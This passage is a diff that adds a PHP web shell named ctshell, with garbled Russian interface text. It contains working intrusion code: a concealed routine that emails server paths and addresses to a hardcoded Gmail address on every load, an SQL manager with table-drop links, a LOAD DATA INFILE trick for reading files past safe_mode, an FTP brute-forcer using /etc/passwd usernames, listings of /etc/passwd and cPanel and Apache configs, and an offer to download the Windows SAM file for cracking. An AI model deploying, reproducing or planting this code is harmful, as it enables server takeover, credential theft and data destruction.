+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u><font size=2 color=#ffffff>".$item[0]."</font></u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+?>
+</div> 
+<font size=2><a href="#" onClick="return branchSwitch('info')" title="ğàñêğûòü">Èíôîğìàòîğ</a></font>
+<div id="info" style="display: none">
+<font size=2>
+<b>Ïğîãğàììíîå îáåñïå÷åíèå:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;<br>
+<b>Ñèñòåìà:&nbsp;<?php echo php_uname(); ?></b>&nbsp;<b><?php if (!$win) {echo `id`;} else {echo get_current_user();} ?></b>
+&nbsp;<br>
+<b>Áåçîïàñíîñòü:&nbsp;<?php echo $hsafemode; ?></b>
+<?
+echo "<br>";
+echo "Âåğñèÿ ÏÕÏ: <b>".@phpversion()."</b>";
+echo "<br>";
+$curl_on = @function_exists('curl_version');
+echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>"));
+echo "<br>";
+echo "MySQL: <b>";
+$mysql_on = @function_exists('mysql_connect');
+if($mysql_on){
+echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; }
+echo "<br>";
+echo "MSSQL: <b>";
+$mssql_on = @function_exists('mssql_connect');
+if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "PostgreSQL: <b>";
+$pg_on = @function_exists('pg_connect');
+if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+echo "<br>";
+echo "Oracle: <b>";
+$ora_on = @function_exists('ocilogon');
+if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";}
+?>
+<?php
+$free = diskfreespace($d);
+if (!$free) {$free = 0;}
+$all = disk_total_space($d);
+if (!$all) {$all = 0;}
+$used = $all-$free;
+$used_percent = round(100/($all/$free),2);
+echo "<br><b>Ñâîáîäíûé ".view_size($free)." of  ".view_size($all)." (".$used_percent."%)</b><br>";
+?>
+</font>
+</div>
+<?
+if ($win)
+{
+?>
+ - <font size=2><a href="#" onClick="return branchSwitch('Drive')" title="ğàñêğûòü">Äèñêè</a></font>
+<?
+}
+?>
+<div id="Drive" style="display: none">
+<?
+$letters = "";
+if ($win)
+{
+ $abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
+ $v = explode("/",$d);
+ $v = $v[0];
+ foreach ($abc as $letter)
+ {
+  if (is_dir($letter.":/"))
+  {
+if ($letter.":" != $v) {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"><IMG src=".$sul."act=img&img=pdisk width=19 height=12 border=0> ".$letter." </a> ";}
+else {$letters .= "<a href=\"".$sul."act=ls&d=".$letter.":\"> <font color=\"green\"> ".$letter." </font></a> ";}
+  }
+ }
+ if (!empty($letters)) {echo "<b>".$letters;}
+}
+?>
+</div> 
+</td><td width=1>
+<font size=2><a href="<? echo $sul; ?>act=about">About</a></font>
+</td></tr></table>
+<TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=2 width="90%"  borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0">
+<tr class=tr1><td>
+<center>
+<?
+if (count($quicklaunch) > 0)
+{
+ foreach($quicklaunch as $item)
+ {
+  $item[1] = str_replace("%d",urlencode($d),$item[1]);
+  $item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
+  echo "<a href=\"".$item[1]."\"><u>".$item[0]."</u></a>&nbsp;&nbsp;&nbsp;&nbsp;";
+ }
+}
+?>
+</center>
+</td></tr></table>
+<?php
+if ((!empty($donated_html)) and (in_array($act,$donated_act)))
+{
+ ?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="90%" valign="top"><?php echo $donated_html; ?></td></tr></table><br>
+<?php
+}
+?>
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="90%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width="100%" valign="top"><?php
+if ($act == "") {$act = $dspact = "ls";}
+if ($act == "sql")
+{
+ $sql_surl = $sul."act=sql";
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
+ if ($sql_port){$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
+ if ($sql_db)  {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
+ $sql_surl .= "&";
+ ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="90%" height="1" colspan="2" valign="top"><center><?php
+ if ($sql_server)
+ {
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
+  $err = mysql_error();
+  @mysql_select_db($sql_db,$sql_sock);
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
+ }
+ else {$sql_sock = false;}
+ echo "<b>Ìåíåäæåğ SQL:</b><br>";
+ if (!$sql_sock)
+ {
+  if (!$sql_server) {echo "ÍÅÒ ÑÂßÇÈ";}
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";}
+ }
+ else
+ {
+  $sqlquicklaunch = array();
+  $sqlquicklaunch[] = array("Index",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
+  if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
+  else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
+  $sqlquicklaunch[] = array("Server-status",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
+  $sqlquicklaunch[] = array("Server variables",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
+  $sqlquicklaunch[] = array("Processes",$sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
+  $sqlquicklaunch[] = array("Logout",$sul."act=sql");
+ 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>";
+
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+  echo "</center>";
+ }
+ echo "</td></tr><tr>";
+ if (!$sql_sock) {?><td  class=td2 width="48%" height="100" valign="top"><center><font size="5"> <br> </font></center>
+<li>Åñëè ëîãèí ÿâëÿåòñÿ ïóñòûì, ëîãèí - âëàäåëåö ïğîöåññà. </li>
+<li>Åñëè õîçÿèí ÿâëÿåòñÿ ïóñòûì, õîçÿèí - localhost </li>
+<li>Åñëè ïîğò ÿâëÿåòñÿ ïóñòûì, ïîğò - 3306 (íåïëàòåæ)</li></td>
+<td  class=td2 width="90%" height="1" valign="top">
+<TABLE height=1 class=table2 cellSpacing=0 cellPadding=0 width="1%" border=0><tr class=tr2>
+<td class=td2>&nbsp;<b><font size=2 color=#000000>Çàïîëíèòå ôîğìó:</font></b><table><tr class=tr2><td class=td2>Èìÿ:</td>
+<td  class=td2 align=right>Ïàğîëü:</td></tr><form><input type="hidden" name="act" value="sql"><tr>
+<td class=td2><input type="text" name="sql_login" value="root" maxlength="64"></td><td  class=td2 align=right>
+<input type="password" name="sql_passwd" value="" maxlength="64"></td></tr><tr class=tr2><td class=td2>Õîñò:</td>
+<td class=td2>Ïîğò:</td></tr><tr><td class=td2><input type="text" name="sql_server" value="localhost" maxlength="64"></td>
+<td class=td2><input type="text" name="sql_port" value="3306" maxlength="6" size="3"><input type="submit" value="Ñîåäèíèòåñü"></td></tr><tr>
+<td class=td2></td></tr></form></table></td><?php }
+ else
+ {
+  if (!empty($sql_db))
+  {
+?><td width="25%" height="100%" valign="top"><a href="<?php echo $sul."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_tables($sql_db);
+if (!$result) {echo mysql_error();}
+else
+{
+ echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>";
+ $c = 0;
+ while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "<b>»&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>
+"; mysql_free_result($count); $c++;}
+ if (!$c) {echo "No tables found in database.";}
+}
+  }
+  else
+  {
+?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php
+$result = mysql_list_dbs($sql_sock);
+if (!$result) {echo mysql_error();}
+else
+{
+ ?><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php
+ echo "<option value=\"\">Databases (...)</option>
+";
+ $c = 0;
+ while ($row = mysql_fetch_row($result)) {echo "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {echo " selected";} echo ">".$row[0]."</option>
+"; $c++;}
+}
+?></select><hr size="1" noshade>Ïîæàëóéñòà, âûáåğèòå áàçó äàííûõ<hr size="1" noshade><input type="submit" value="Go"></form><?php
+  }
+  echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">";
+  if ($sql_db)
+  {
+echo "<center><b>There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").<br>";
+if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><u>".$item[0]."</u></a> ] ";}}
+echo "</b></center>";
+
+$acts = array("","dump");
+
+if ($sql_act == "query")
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($submit)
+ {
+  if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act)) {echo "<form method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to  :";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"60\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form>";}
+}
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new table:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>SQL-Dump DB:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".$SERVER_NAME."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+ if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";}
+ if ($sql_act == "newtpl")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";
+ }
+ else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+}
+elseif ($sql_act == "dump")
+{
+ $set = array();
+ $set["sock"] = $sql_sock;
+ $set["db"] = $sql_db;
+ $dump_out = "print";
+ if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
+ elseif ($dump_out == "download")
+ {
+  @ob_clean();
+  header("Content-type: ctshell");
+  header("Content-disposition: attachment; filename=\"".$f."\";"); 
+  $set["print"] = 1;
+  $set["nl2br"] = 1;
+ }
+ $set["file"] = $dump_file;
+ $set["add_drop"] = true;
+ $ret = mysql_dump($set);
+ if ($dump_out == "download") {exit;}
+}
+else
+{
+ $result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error()); 
+ echo "<br><form method=\"POST\"><TABLE cellSpacing=0 cellPadding=1 bgColor=#333333 borderColorLight=#333333 border=1>";
+ echo "<tr>";
+ echo "<td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td>";
+ echo "<td><center><b>Table</b></center></td>";
+ echo "<td><b>Rows</b></td>";
+ echo "<td><b>Type</b></td>";
+ echo "<td><b>Created</b></td>";
+ echo "<td><b>Modified</b></td>";
+ echo "<td><b>Size</b></td>";
+ echo "<td><b>Action</b></td>";
+ echo "</tr>";
+ $i = 0;
+ $tsize = $trows = 0;
+ while ($row = mysql_fetch_array($result, MYSQL_NUM))
+ {
+  $tsize += $row["5"];
+  $trows += $row["5"];
+  $size = view_size($row["5"]);
+  echo "<tr>";
+  echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row[0]."\"></td>";
+  echo "<td>&nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".$row[0]."</b></a>&nbsp;</td>";
+  echo "<td>".$row[3]."</td>";
+  echo "<td>".$row[1]."</td>";
+  echo "<td>".$row[10]."</td>";
+  echo "<td>".$row[11]."</td>";
+  echo "<td>".$size."</td>";
+  echo "<td>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_empty\" height=\"13\" width=\"11\" border=\"0\"></a>
+&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_drop\" height=\"13\" width=\"11\" border=\"0\"></a>
+<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row[0]."`")."\"><img src=\"".$sul."act=img&img=sql_button_insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;
+</td>";
+  echo "</tr>";
+  $i++;
+ }
+ echo "<tr bgcolor=\"000000\">";
+ echo "<td><center><b>»</b></center></td>";
+ echo "<td><center><b>".$i." table(s)</b></center></td>";
+ echo "<td><b>".$trows."</b></td>";
+ echo "<td>".$row[1]."</td>";
+ echo "<td>".$row[10]."</td>";
+ echo "<td>".$row[11]."</td>";
+ echo "<td><b>".view_size($tsize)."</b></td>";
+ echo "<td></td>";
+ echo "</tr>";
+ echo "</table><hr size=\"1\" noshade><img src=\"".$sul."act=img&img=arrow_ltr\" border=\"0\"><select name=\"actselect\">
+<option>With selected:</option>
+<option value=\"drop\" >Drop</option>
+<option value=\"empty\" >Empty</option>
+<option value=\"chk\">Check table</option>
+<option value=\"Optimize table\">Optimize table</option>
+<option value=\"Repair table\">Repair table</option>
+<option value=\"Analyze table\">Analyze table</option>
+</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form>";
+ mysql_free_result($result);
+}
+  }
+  }
+  else
+  {
+$acts = array("","newdb","serverstat","servervars","processes","getfile");
+if (in_array($sql_act,$acts))
+{
+ ?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Ñîçäàéòå íîâûé Áàçó:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Ñîçäàòü"></form></td><td width="30%" height="1"><b>Ïğèñìîòğåòü Ôàéëà:</b><form action="<?php echo $sul; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Âçÿòü"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php
+}
+if (!empty($sql_act))
+{
+ echo "<hr size=\"1\" noshade>";
+ if ($sql_act == "newdb")
+ {
+  echo "<b>";
+  if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+  else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_error();}
+ }
+ if ($sql_act == "serverstatus")
+ {
+  $result = mysql_query("SHOW STATUS", $sql_sock); 
+  echo "<center><b>Server-status variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table></center>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "servervars")
+ {
+  $result = mysql_query("SHOW VARIABLES", $sql_sock); 
+  echo "<center><b>Server variables:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>value</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} 
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ if ($sql_act == "processes")
+ {
+  if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+  $result = mysql_query("SHOW PROCESSLIST", $sql_sock); 
+  echo "<center><b>Ïğîöåññû:</b><br><br>";
+  echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td>STATE</td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+  while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+  echo "</table>";
+  mysql_free_result($result);
+ }
+ elseif (($sql_act == "getfile"))
+ {
+  if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
+  elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
+  else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
+  else
+  {
+for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+$f = ""; 
+while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
+if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b>";}
+else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f));}
+  }
+  mysql_free_result($result);
+  if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
+  }
+ }
+}
+  }
+ }
+ echo "</tr></table></table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d) {if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}}
+ echo "<br><br>";
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if ($win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function ctftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+if ($fqb_onlywithsh)
+{
+ if (!in_array($sh,array("/bin/bash","/bin/sh","/usr/local/cpanel/bin/jailshell"))) {$true = false;}
+ else {$true = true;}
+}
+else {$true = true;}
+if ($true)
+{
+ $sock = @ftp_connect($host,$port,$timeout);
+ if (@ftp_login($sock,$login,$pass))
+ {
+  echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+  ob_flush();
+  return true;
+ }
+}
+  }
+  if (!empty($submit))
+  {
+if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+$fp = fopen("/etc/passwd","r");
+if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+else
+{
+ ob_flush();
+ $i = $success = 0;
+ $ftpquick_st = getmicrotime();
+ while(!feof($fp))
+ { 
+  $str = explode(":",fgets($fp,2048));
+  if (ctftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+  {
+$success++;
+  }
+  if ($i > $fqb_lenght) {break;}
+  $i++;
+ } 
+ if ($success == 0) {echo "No success. connections!";}
+ $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+ echo "<hr size=\"1\" noshade><b>Done!<br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=\"green\"><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br><b>Connects per second: ".round($i/$ftpquick_t,2)."</b><br>";
+}
+  }
+  else {echo "<form method=\"POST\"><br>Read first: <input type=\"text\" name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br><input type=\"submit\" name=\"submit\" value=\"Brute\"></form>";}
+ }
+}
+if ($act == "lsa")
+{
+ echo "<center><b>Èíôîğìàöèÿ áåçîïàñíîñòè ñåğâåğà:</b></center>";
+ echo "<b>Ïğîãğàììíîå îáåñïå÷åíèå:</b> ".PHP_OS.", ".$SERVER_SOFTWARE."<br>";
+ echo "<b>Áåçîïàñíîñòü: ".$hsafemode."</b><br>";
+ echo "<b>Îòêğûòûé îñíîâíîé äèğåêòîğ: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+if ($nixpasswd == 1) {$nixpasswd = 0;}
+$num = $nixpasswd + $nixpwdperpage;
+echo "<b>*nix /etc/passwd:</b><br>";
+$i = $nixpasswd;
+while ($i < $num)
+{
+ $uid = posix_getpwuid($i);
+ if ($uid) {echo join(":",$uid)."<br>";}
+ $i++;
+}
+  }
+  else {echo "<br><a href=\"".$sul."act=lsa&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+  if (file_get_contents("/etc/userdomains")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=userdomains&d=/etc/&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=accounting.log&d=/var/cpanel/&ft=txt\"><u><b>View cpanel logs</b></u></a></font></b><br>";}
+  if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/usr/local/apache/conf/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+  if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=\"green\"><a href=\"".$sul."act=f&f=httpd.conf&d=/etc/&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=\"red\">You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=\"green\">Âû ìîæåòå âçëîìàòü winnt ïàğîëè. <a href=\"".$sul."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Ñêà÷àòü</b></u></a>, c èñïîëüçîâàíèå lcp.crack+.</font></b><br>";}
+ }
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "fsbuff")
+{
+ $arr_copy = $sess_data["copy"];
+ $arr_cut = $sess_data["cut"];
+ $arr = array_merge($arr_copy,$arr_cut);
+ if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";}
+ else
+ {
+  echo "<b>File-System buffer</b><br><br>";
+  $ls_arr = $arr;
+  $disp_fullpath = true;
+  $act = "ls";
+ }
+}
+if ($act == "selfremove")
+{
+ if (!empty($submit))
+ {
+  if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using ctshell v.".$cv."!"; exit; }
